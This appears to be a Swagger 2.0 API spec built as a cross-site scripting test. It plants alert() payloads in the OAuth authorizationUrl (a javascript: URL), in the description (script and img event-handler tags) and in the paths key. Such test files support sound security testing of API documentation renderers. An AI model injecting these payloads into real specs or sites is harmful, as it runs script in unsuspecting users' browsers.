swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(22)//
info:
  version: "1.0.0"
  title: XSS img test
  description: <script>alert(9)</script> <img src=https://academy.avast.com/hubfs/New_Avast_Academy/Hackers/Hacker-Hero-a1.png onclick="alert(2)"  onmouseover="alert('xxs')> 
  /: paths:<script>alert(55)</script>
    get:
      responses:
        200:
          description: Successful response
